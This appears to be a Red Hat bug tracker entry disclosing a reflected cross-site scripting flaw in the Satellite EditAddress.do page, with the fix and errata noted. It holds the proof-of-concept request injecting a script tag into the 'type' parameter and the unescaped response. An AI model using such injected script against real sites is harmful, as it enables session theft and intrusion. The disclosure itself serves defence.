Ryan Giobbi from UPMC reported an XSS flaw in the EditAddress.do page: Request GET /rhn/account/EditAddress.do?type=M83ab7<script>alert(1)</script>c47ea873a9d&uid=41 HTTP/1.1 Host: host.example.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Response HTTP/1.0 200 OK Date: Thu, 21 Feb 2013 18:24:04 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: pxt-session-cookie=7053xcace9e6d1158735e6f047ab49e4e509c; Path=/; Secure; HttpOnly Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="e ...[SNIP]... <h2> **address type M83ab7<script>alert(1)</script>c47ea873a9d** Record: </h2> ...[SNIP]...
Acknowledgements: Red Hat would like to thank Ryan Giobbi of UPMC for reporting this issue.
Created attachment 820005 [details] Patch fixes XSS issue Fix the reported issue
commit 07a7bd38b492cf2d77e1223ae3acfac75244254e
This issue has been addressed in following products: Red Hat Satellite Server v 5.6 Via RHSA-2014:0148 https://rhn.redhat.com/errata/RHSA-2014-0148.html